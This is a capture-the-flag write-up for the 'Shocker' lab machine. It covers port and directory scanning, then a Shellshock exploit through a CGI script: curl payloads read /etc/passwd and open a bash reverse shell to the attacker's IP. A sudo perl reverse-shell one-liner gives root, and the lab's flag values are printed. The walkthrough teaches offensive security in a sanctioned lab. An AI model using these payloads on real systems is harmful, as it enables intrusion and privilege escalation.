This is an easy linux box
Tools used
- curl
- find
- ffuf
- nc
- nmap
- perl
- sudo
Reconnaissance
Nmap
nmap -sC -sV -oA shocker 10.10.10.56 -v -Pn
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here’s what nmap teaches us :
- port 80 (HTTP) - Apache 2.4.18
- port 2222 (SSH) - OpenSSH 7.2p
Not a lot of ports open. Go check the website :
There is nothing here, so let’s search for files/directories. For that I used ffuf https://github.com/ffuf/ffuf.
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.56/FUZZ -e php,txt,html,/ -t 100
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.10.56/FUZZ
:: Wordlist : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
:: Extensions : php txt html /
:: Follow redirects : true
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
cgi-bin/ [Status: 403, Size: 294, Words: 22, Lines: 12]
icons/ [Status: 403, Size: 292, Words: 22, Lines: 12]
Common Gateway Interface (CGI) is an interface specification for web servers to execute programs like console applications running on a server (https://en.wikipedia.org/wiki/Common_Gateway_Interface).
The name of the box is a big hing “Shocker”, knowing that there is a “cgi-bin” folder, there must be a script vulnerable to a shellshock.
When a web server uses the Common Gateway Interface (CGI) to handle a document request, it copies certain information from the request into the environment variable list and then delegates the request to a handler program. If the handler is a Bash script, or if it executes one for example using the system call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted document request (https://en.wikipedia.org/wiki/Shellshock_(software_bug)).
Let’s find out the script, still with fuff. For the extension, I used some common scripts extensions.
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.56/cgi-bin/FUZZ -e .php,.py,.pl,.sh -t 250
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.10.56/cgi-bin/FUZZ
:: Wordlist : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
:: Extensions : .php .py .pl .sh
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 250
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
user.sh [Status: 200, Size: 118, Words: 18, Lines: 8]
There is a script called “user.sh”, when called it returns the uptime of the server.
curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
04:48:11 up 15:15, 0 users, load average: 0.05, 0.45, 0.39
Exploit
First I tried this one liner that I found here https://github.com/opsxcq/exploit-CVE-2014-6271 :
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash
Nice, it is vulnerable to Shellshock ! Now let’s get a reverse shell. First start a nc listener :
nc -lvp 1234
Now execute the exploit, I took the reverse shell from here : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.4/1234 0>&1" http://10.10.10.56/cgi-bin/user.sh
And there we have a reverse shell !
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.56: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 46792
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
So we’re not root, let’s escalate to root ! First thing that I do when I don’t have “root” privileges is to run the following command :
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Bingo ! As we can see the user shelly can run the perl binary with root privileges. So, all I have to do is to found a perl reverse shell and execute it with sudo. First let’s open another nc listener :
nc -lvp 12345
Then execute the reverse shell with root privileges, the perl reverse shell comes from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.
sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.4";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And voila !
nc -lvp 12345
listening on [any] 12345 ...
10.10.10.56: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 60392
/bin/sh: 0: can't access tty; job control turned off
whoami
root
There we have a shell as root ! Go search for the flags now !
Flags
User.txt
shelly@Shocker:/usr/lib/cgi-bin$ find /home -name user.txt
find /home -name user.txt
/home/shelly/user.txt
shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233
Root.txt
find / -name root.txt
/root/root.txt
cat /root/root.txt
52c2715605d70c7619030560dc1ca467
- OSCP (30) ,
- Writeup (26) ,
- Linux (14) ,
- Shellshock (1) ,
- Perl (1) ,
- Web (19) ,
- Injection (3) ,
- CGI (1)